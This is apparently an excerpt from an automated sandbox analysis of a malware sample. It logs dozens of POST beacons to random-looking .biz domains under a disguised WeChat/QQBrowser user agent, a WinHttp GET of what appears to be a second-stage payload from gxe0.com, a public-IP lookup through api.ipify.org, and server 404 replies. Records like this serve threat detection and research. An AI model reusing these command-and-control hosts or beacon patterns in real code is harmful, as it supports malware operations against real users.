                    Source: global trafficHTTP traffic detected: POST /xdg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fhfpwltbvv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vibxotdbuqgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kgihefbgeqqddpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /squ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wkhnxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ymqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /agymgtakvgyrav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kuchnhalursvbkw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ffce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cfywrdqxndo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xkbliseb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ftwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dfpdwbwsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dabmiwkjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jfojqnmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /oaviebkmaqfhvfw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /knymqarjimdb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /leiqqbxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tyysl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /arao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nfbfdhwgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /phpvxvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /llxpkbesjvfxqu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /enot HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ojuwxx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /neqnfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jsjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sagfsex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /metsntamhpqia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mwjtyvmb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cpmmdtwjhfebkhhd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hsywil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /regvctlfaj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /swkrgjmrquig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ifid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fgevaiedsfhm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fdlglrypxsfrxfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hvedkntqmbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bmomvdem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /frjrhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pdk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /frknndojmsuq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /gdpjsspvdebtqhf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vvmcwp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hctkqhhcrnud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ntc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic
                    HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: gxe0.com
                    Source: global traffic
                    HTTP traffic detected: GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: unknown
                    HTTP traffic detected: POST /bkk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        Host: pywolwnvd.biz
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                        Content-Length: 844
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx/1.14.0 (Ubuntu)
                        Date: Mon, 18 Nov 2024 08:57:43 GMT
                        Content-Type: text/html
                        Content-Length: 580
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx/1.14.0 (Ubuntu)
                        Date: Mon, 18 Nov 2024 08:57:52 GMT
                        Content-Type: text/html
                        Content-Length: 580
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx/1.14.0 (Ubuntu)
                        Date: Mon, 18 Nov 2024 08:58:16 GMT
                        Content-Type: text/html
                        Content-Length: 580
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Content-Type: text/plain; charset=utf-8
                        X-Content-Type-Options: nosniff
                        Date: Mon, 18 Nov 2024 08:58:18 GMT
                        Content-Length: 19
                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                        Data Ascii: 404 page not found
                    Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: nginx/1.14.0 (Ubuntu)
                        Date: Mon, 18 Nov 2024 08:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 580
                        Connection: keep-alive
                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Mon, 18 Nov 2024 08:58:43 GMT | Content-Length: 19 | Data Ascii: 404 page not found
